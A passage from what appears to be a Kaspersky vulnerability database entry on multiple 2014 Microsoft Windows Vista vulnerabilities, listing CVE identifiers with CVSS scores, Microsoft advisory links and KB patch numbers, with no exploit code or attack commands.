\n[CVE-2013-5065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065>) \n[CVE-2014-0300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0300>) \n[CVE-2014-0323](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0323>) \n[CVE-2014-4971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4971>) \n[CVE-2014-0301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0301>) \n[CVE-2014-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0262>) \n[CVE-2014-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0263>) \n[CVE-2014-4115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4115>) \n[CVE-2014-4113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4113>) \n[CVE-2014-0315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0315>) \n[CVE-2014-0316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0316>) \n[CVE-2014-0317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0317>) \n[CVE-2014-0255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0255>) \n[CVE-2014-0318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0318>) \n[CVE-2014-4118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4118>) \n[CVE-2014-6352](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6352>) \n[CVE-2014-6332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6332>) \n[CVE-2014-0296](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0296>) \n[CVE-2014-0256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0256>) \n[CVE-2014-1811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1811>) \n[CVE-2014-0254](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0254>) \n[CVE-2014-1819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1819>) \n[CVE-2014-6355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6355>) \n[CVE-2014-2780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2780>) \n[CVE-2014-2781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2781>) \n[CVE-2014-1812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1812>) \n[CVE-2014-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4064>) \n[CVE-2014-6318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6318>) \n[CVE-2014-1814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1814>) \n[CVE-2014-4060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4060>) \n[CVE-2014-1824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1824>) \n[CVE-2014-6317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6317>) \n[CVE-2014-4114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4114>) \n[CVE-2014-4148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2014-1816](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1816>)4.3Warning \n[CVE-2014-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6532>)9.3Critical \n[CVE-2014-0266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0266>)7.1High \n[CVE-2014-4076](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076>)7.2High \n[CVE-2014-6321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6321>)10.0Critical \n[CVE-2014-6322](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6322>)4.3Warning \n[CVE-2014-6324](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324>)9.0Critical \n[CVE-2014-1767](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1767>)7.2High \n[CVE-2014-4077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4077>)9.3Critical \n[CVE-2014-4074](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4074>)6.8High \n[CVE-2014-1807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1807>)7.2High \n[CVE-2013-5065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065>)7.2High \n[CVE-2014-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0300>)7.2High \n[CVE-2014-0323](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0323>)6.6High \n[CVE-2014-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4971>)7.2High \n[CVE-2014-0301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0301>)9.3Critical \n[CVE-2014-0262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0262>)7.2High \n[CVE-2014-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0263>)9.3Critical \n[CVE-2014-4115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4115>)7.2High \n[CVE-2014-4113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4113>)7.2High \n[CVE-2014-0315](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0315>)6.9High \n[CVE-2014-0316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0316>)7.5Critical \n[CVE-2014-0317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0317>)5.4High \n[CVE-2014-0255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0255>)5.0Critical \n[CVE-2014-0318](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0318>)7.2High \n[CVE-2014-4118](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4118>)9.3Critical \n[CVE-2014-6352](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352>)9.3Critical \n[CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>)9.3Critical \n[CVE-2014-0296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0296>)5.1High \n[CVE-2014-0256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0256>)5.0Critical \n[CVE-2014-1811](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1811>)5.0Critical \n[CVE-2014-0254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0254>)7.8Critical \n[CVE-2014-1819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1819>)7.2High \n[CVE-2014-6355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6355>)5.0Critical \n[CVE-2014-2780](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2780>)6.9High \n[CVE-2014-2781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2781>)7.6Critical \n[CVE-2014-1812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1812>)6.8High \n[CVE-2014-4064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4064>)4.9Warning \n[CVE-2014-6318](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6318>)5.0Critical \n[CVE-2014-1814](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1814>)7.2High \n[CVE-2014-4060](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4060>)6.8High \n[CVE-2014-1824](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1824>)9.3Critical \n[CVE-2014-6317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6317>)7.1High \n[CVE-2014-4114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114>)9.3Critical \n[CVE-2014-4148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[2966631](<http://support.microsoft.com/kb/2966631>) \n[2957482](<http://support.microsoft.com/kb/2957482>) \n[2966061](<http://support.microsoft.com/kb/2966061>) \n[2939576](<http://support.microsoft.com/kb/2939576>) \n[2922229](<http://support.microsoft.com/kb/2922229>) \n[2973201](<http://support.microsoft.com/kb/2973201>) \n[2975689](<http://support.microsoft.com/kb/2975689>) \n[2957189](<http://support.microsoft.com/kb/2957189>) \n[3013126](<http://support.microsoft.com/kb/3013126>) \n[2969259](<http://support.microsoft.com/kb/2969259>) \n[2929961](<http://support.microsoft.com/kb/2929961>) \n[3010788](<http://support.microsoft.com/kb/3010788>) \n[2984615](<http://support.microsoft.com/kb/2984615>) \n[2914368](<http://support.microsoft.com/kb/2914368>) \n[3003743](<http://support.microsoft.com/kb/3003743>) \n[3002885](<http://support.microsoft.com/kb/3002885>) \n[2904659](<http://support.microsoft.com/kb/2904659>) \n[2961858](<http://support.microsoft.com/kb/2961858>) \n[3005607](<http://support.microsoft.com/kb/3005607>) \n[2962490](<http://support.microsoft.com/kb/2962490>) \n[2592687](<http://support.microsoft.com/kb/2592687>) \n[2966034](<http://support.microsoft.com/kb/2966034>) \n[2993958](<http://support.microsoft.com/kb/2993958>) \n[2988948](<http://support.microsoft.com/kb/2988948>) \n[2961072](<http://support.microsoft.com/kb/2961072>) \n[2926765](<http://support.microsoft.com/kb/2926765>) \n[2973932](<http://support.microsoft.com/kb/2973932>) \n[2962123](<http://support.microsoft.com/kb/2962123>) \n[2998579](<http://support.microsoft.com/kb/2998579>) \n[2989935](<http://support.microsoft.com/kb/2989935>) \n[2973906](<http://support.microsoft.com/kb/2973906>) \n[2961899](<http://support.microsoft.com/kb/2961899>) \n[2933826](<http://support.microsoft.com/kb/2933826>) \n[2962478](<http://support.microsoft.com/kb/2962478>) \n[2975685](<http://support.microsoft.com/kb/2975685>) \n[2975684](<http://support.microsoft.com/kb/2975684>) \n[2916036](<http://support.microsoft.com/kb/2916036>) \n[2975681](<http://support.microsoft.com/kb/2975681>) \n[2978742](<http://support.microsoft.com/kb/2978742>) \n[2933528](<http://support.microsoft.com/kb/2933528>) \n[2934418](<http://support.microsoft.com/kb/2934418>) \n[2993254](<http://support.microsoft.com/kb/2993254>) \n[2978668](<http://support.microsoft.com/kb/2978668>) \n[2974286](<http://support.microsoft.com/kb/2974286>) \n[2928120](<http://support.microsoft.com/kb/2928120>) \n[2991963](<http://support.microsoft.com/kb/2991963>) \n[2992611](<http://support.microsoft.com/kb/2992611>) \n[3000869](<http://support.microsoft.com/kb/3000869>) \n[3011443](<http://support.microsoft.com/kb/3011443>) \n[2923392](<http://support.microsoft.com/kb/2923392>) \n[2962488](<http://support.microsoft.com/kb/2962488>) \n[2918614](<http://support.microsoft.com/kb/2918614>) \n[2962485](<http://support.microsoft.com/kb/2962485>) \n[2889913](<http://support.microsoft.com/kb/2889913>) \n[2912390](<http://support.microsoft.com/kb/2912390>) \n[2962486](<http://support.microsoft.com/kb/2962486>) \n[2930275](<http://support.microsoft.com/kb/2930275>) \n[2919355](<http://support.microsoft.com/kb/2919355>) \n[2965788](<http://support.microsoft.com/kb/2965788>) \n[2972280](<http://support.microsoft.com/kb/2972280>) \n[2962073](<http://support.microsoft.com/kb/2962073>) \n[2971850](<http://support.microsoft.com/kb/2971850>) \n[2992719](<http://support.microsoft.com/kb/2992719>) \n[2993651](<http://support.microsoft.com/kb/2993651>) \n[3000061](<http://support.microsoft.com/kb/3000061>) \n[2913602](<http://support.microsoft.com/kb/2913602>) \n[2976897](<http://support.microsoft.com/kb/2976897>) \n[2973408](<http://support.microsoft.com/kb/2973408>) \n[3006226](<http://support.microsoft.com/kb/3006226>) \n[3011780](<http://support.microsoft.com/kb/3011780>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2014-11-11T00:00:00", "id": "KLA10601", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10601", "title": "\r KLA10601Multiple vulnerabilities in Microsoft products ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
